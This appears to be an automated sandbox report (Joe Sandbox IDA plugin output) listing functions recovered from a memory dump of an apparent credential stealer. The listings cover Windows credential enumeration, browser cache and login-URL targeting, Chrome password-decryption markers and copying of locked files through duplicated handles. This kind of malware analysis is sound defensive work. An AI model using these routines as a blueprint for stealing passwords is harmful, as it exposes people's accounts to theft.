                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                      • API String ID: 2744995895-28296030
                                                                                                                                                                                                                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040BB66
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                                                                                                                                                      • String ID: chp$v10
                                                                                                                                                                                                                      • API String ID: 170802307-2783969131
                                                                                                                                                                                                                      • Opcode ID: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                                                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040E407
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040E422
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040E43D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                                                                                                                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                      • API String ID: 3073804840-2252543386
                                                                                                                                                                                                                      • Opcode ID: 35fc9b2dc3bf0c53ac8202c9ceeae987a6694a0ed3ba5102275c9a20083620c3
                                                                                                                                                                                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35fc9b2dc3bf0c53ac8202c9ceeae987a6694a0ed3ba5102275c9a20083620c3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph (graph rendering not reproduced in text)

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memcmp$ByteCharMultiWidememset
• String ID:
• API String ID: 3715365532-3916222277
• Opcode ID: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
• Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
• Opcode Fuzzy Hash: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
• Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
  • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
• GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
• DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
• GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
• CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
• WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
• UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
• FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNEL32(00000000), ref: 0040E143
• CloseHandle.KERNEL32(?), ref: 0040E148
• CloseHandle.KERNEL32(?), ref: 0040E14D
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
• String ID: bhv
• API String ID: 327780389-2689659898
• Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
• Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
• Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
• Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (graph rendering not reproduced in text)

APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
• GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
• GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
• GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
• GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2941347001-70141382
• Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
• Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
• Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
• Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 711 4467ac-4467b7 __setusermatherr 703->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->712 705->701 707 44674d-44674f 705->707 706->701 709 446734-44673b 706->709 710 446755-446758 707->710 709->701 713 44673d-446745 709->713 710->703 711->712 716 446810-446819 712->716 717 44681e-446825 712->717 713->710 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 726 446853-446864 GetStartupInfoW 721->726 727 44684d-446851 721->727 722->720 723->719 723->724 724->721 728 446840-446842 724->728 730 446866-44686a 726->730 731 446879-44687b 726->731 727->726 727->728 728->721 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
APIs
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
• String ID:
• API String ID: 2827331108-0
• Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
• Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
• Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
• Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• wcschr.MSVCRT ref: 0040C324
• wcschr.MSVCRT ref: 0040C344
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
• GetLastError.KERNEL32 ref: 0040C373
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
• FindCloseUrlCache.WININET(?), ref: 0040C3B0
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
• String ID: visited:
• API String ID: 1157525455-1702587658
• Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
• Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
• Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
• Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 781 40e283-40e286 775->781 776->775 787 40e21b-40e21d 776->787 784 40e291-40e294 call 40aa04 781->784 785 40e288-40e290 ??3@YAXPAX@Z 781->785 784->769 785->784 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
• memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
• _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• API String ID: 3883404497-2982631422
• Opcode ID: f6320f83e9b091826697580f88646c77f053f42bbd7529e7c130ef97409cf436
• Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
• Opcode Fuzzy Hash: f6320f83e9b091826697580f88646c77f053f42bbd7529e7c130ef97409cf436
• Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040BC75
• memset.MSVCRT ref: 0040BC8C
• WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
• memcmp.MSVCRT ref: 0040BCD6
• memcpy.MSVCRT ref: 0040BD2B
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
• String ID:
• API String ID: 509814883-3916222277
• Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
• Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 848 41837f-4183bf 849 4183c1-4183cc call 418197 848->849 850 4183dc-4183ec call 418160 848->850 855 4183d2-4183d8 849->855 856 418517-41851d 849->856 857 4183f6-41840b 850->857 858 4183ee-4183f1 850->858 855->850 859 418417-418423 857->859 860 41840d-418415 857->860 858->856 861 418427-418442 call 41739b 859->861 860->861 864 418444-41845d CreateFileW 861->864 865 41845f-418475 CreateFileA 861->865 866 418477-41847c 864->866 865->866 867 4184c2-4184c7 866->867 868 41847e-418495 GetLastError ??3@YAXPAX@Z 866->868 871 4184d5-418501 memset call 418758 867->871 872 4184c9-4184d3 867->872 869 4184b5-4184c0 call 444706 868->869 870 418497-4184b3 call 41837f 868->870 869->856 870->856 878 418506-418515 ??3@YAXPAX@Z 871->878 872->871 878->856
APIs
• CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
• GetLastError.KERNEL32 ref: 0041847E
• ??3@YAXPAX@Z.MSVCRT ref: 0041848B
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile$??3@ErrorLast
                                                                                                                                                                                                                      • String ID: |A
                                                                                                                                                                                                                      • API String ID: 1407640353-1717621600
                                                                                                                                                                                                                      • Opcode ID: 5aeeff076a9cd849f72a1ec08649adad283ef9ce1d91fa95086884072959f8da
                                                                                                                                                                                                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5aeeff076a9cd849f72a1ec08649adad283ef9ce1d91fa95086884072959f8da
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                                                                      • API String ID: 2791114272-628097481
                                                                                                                                                                                                                      • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                        • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                      • API String ID: 62308376-4196376884
                                                                                                                                                                                                                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                      • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040BEB2
